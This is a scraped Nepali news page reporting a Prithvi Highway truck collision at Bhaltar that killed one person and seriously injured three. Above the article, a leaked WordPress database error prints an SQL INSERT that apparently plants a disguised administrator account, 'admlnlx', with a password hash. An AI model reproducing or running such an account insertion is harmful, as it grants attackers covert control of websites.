WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bmtbj4rgKiu4u1woKVX/DGjRdo4kv2/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 07:43:42', '', 'admlnlx', 'admlnlx')
चितवन,पुस ११-
पृथ्वी राजमार्गअन्तर्गत बैरेनी गाविस–८, भल्टारमा आज विहान भएको सवारी दुर्घटनामा परी एक जनाको मृत्यु भएको छ । दुर्घटनामा अन्य तीन जना गम्भीर घाइते भएका छन्।
चितवनबाट काठमाडौँतर्फ आउँदै गरेको लु १ ख ९५८७ नंको ट्रक विपरीत दिशाबाट आइरहेको ना ६ ख १११० नंको ट्रकसँग जुधेर दुर्घटना भएको जिल्ला प्रहरी कार्यालयले जनाएको छ।
लु १ ख ९५८७ नंको ट्रकमा सवार एकजनाको घटनास्थलमै मृत्यु भएको र अन्य तीन जना गम्भीर घाइते भएकाले उपचारका लागि काठमाडौँ पठाइएको सशस्त्र प्रहरी बेस क्याम्प आदमघाटले जानकारी दिएको छ । मृतकको सनाखत भएको छैन । रासस